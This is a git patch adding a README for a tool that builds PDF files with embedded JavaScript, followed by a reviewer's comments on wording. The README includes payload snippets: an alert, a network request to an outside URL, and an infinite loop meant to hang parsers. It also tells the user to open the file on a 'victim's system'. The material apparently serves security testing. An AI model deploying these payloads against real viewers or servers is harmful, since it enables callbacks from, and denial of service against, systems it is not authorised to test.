From 5817de1fb2e6a2a243b050673305fe6ed2a2e573 Mon Sep 17 00:00:00 2001 From: Mat Date: Tue, 7 Mar 2023 17:10:23 +0100 Subject: [PATCH] Add documentation for PDF JS PoC --- .../Extension PDF JS/README.md | 44 +++++++++++++++++++ 1 file changed, 44 insertions(+) create mode 100644 Upload Insecure Files/Extension PDF JS/README.md diff --git a/Upload Insecure Files/Extension PDF JS/README.md b/Upload Insecure Files/Extension PDF JS/README.md new file mode 100644 index 0000000..1ab4852 --- /dev/null +++ b/Upload Insecure Files/Extension PDF JS/README.md @@ -0,0 +1,44 @@ +# Generate PDF File Containing JavaScript Code + +PDF may contain JavaScript code. +This script allow us to generate a PDF file which helps us to check if that code is executed when the file is opened. +Possible targets are client applications trying to open the file or sererside backends which are parsing the PDF file. + +## HowTo + +1. Edit the file `poc.js` with the JS code you want to have included in your PDF file +2. Install the required python modules using `pip install pdfrw` +3. Create the PDF: `python poc.py poc.js` +4. Open the file `result.pdf` on your victim's system + +## Possible exploit codes + +The full set of available functions is documented here: https://opensource.adobe.com/dc-acrobat-sdk-docs/library/jsapiref/JS_API_AcroJS.html + +### XSS (for GUI viewers) + +```js +app.alert("XSS"); +``` + +### Open URL + +```js +var cURL="http://[REDACTED]/"; +var params = +{ + cVerb: "GET", + cURL: cURL +}; +Net.HTTP.request(params); +``` + +### Timeout + +```js +while (true) {} +``` + +## References + +The code is based on https://github.com/osnr/horrifying-pdf-experiments/
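Review bot: The intro paragraph of the new README has two typos: "This script allow us" should be "allows", and "sererside" should be "server-side". In the HowTo list, step 4 ("Open the file `result.pdf` on your victim's system") would be clearer as "the application or parser under test", and step 2 installs `pdfrw` without a version, so pinning one would keep the steps reproducible. The heading "XSS (for GUI viewers)" is misleading, because `app.alert("XSS");` demonstrates script execution inside the PDF viewer rather than cross-site scripting in a web origin; something like "Alert box (GUI viewers)" fits better. Likewise "Timeout" over `while (true) {}` reads more accurately as "Hang / infinite loop". The intro names server-side backends as a target, but the README does not say what result to expect from each snippet there (an alert has nothing to display in a headless parser), so a short line per snippet stating the observable outcome would help.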